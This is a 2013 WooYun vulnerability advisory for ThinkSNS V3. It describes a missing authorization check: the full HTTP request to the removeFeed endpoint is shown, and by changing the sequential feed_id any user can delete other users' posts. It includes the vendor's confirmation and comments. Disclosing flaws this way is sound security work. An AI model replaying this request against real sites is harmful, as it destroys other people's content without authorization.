当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020731

漏洞标题:ThinkSNS V3缺陷-02

相关厂商:ThinkSNS

漏洞作者: zzR

提交时间:2013-03-27 02:46

修复时间:2013-05-11 02:47

公开时间:2013-05-11 02:47

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-27: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-11: 细节向公众公开

简要描述:

ThinkSNS V3正式放出,特表示祝贺。
不带刷的,友情检测(因为我们公司要用!真的要用!!)

详细说明:

关键词:任意用户微博(动态)删除!
删除个人微博(动态)请求如下

POST /t3/index.php?app=public&mod=Feed&act=removeFeed HTTP/1.1
Host: demo.thinksns.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://demo.thinksns.com/t3/
Content-Length: 13
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
feed_id=297XX


可以清楚的看见,feed_id就是微博动态的id,并且这个id是递增的,可以遍历,那就是说, 我可以把首页所有的微博都删除!

漏洞证明:

事实胜于雄辩,请看一组实验。

29738.png


先在用户1发一篇微博,feed_id=29738

29737改为29738.png


用户二发布一篇微博,feed_id=29737,此时拦截删除微博请求,同时,将此feed_id修改为29738,forward一下,看结果噻。

admin无微博.png


用户1此feed_id=29738 微博已被删除。

root微博.png


用户二微博,依旧挺拔。

修复方案:

权限!

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-27 09:50

厂商回复:

没测试,过程详细,相信你提到的问题是存在的,我们尽快改进。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-27 03:54 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    你就不能一起发嘛????亲!!!

  2. 2013-03-27 07:56 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

    @小胖子 漏洞类型不同,这不得慢慢来嘛

  3. 2013-03-27 09:14 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:89 | 一名普通的phper开发者,关注web安全。)

    @zzR 买授权了没!

  4. 2013-03-27 09:16 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

    @齐迹 之前TS说了可以给我一套 -0-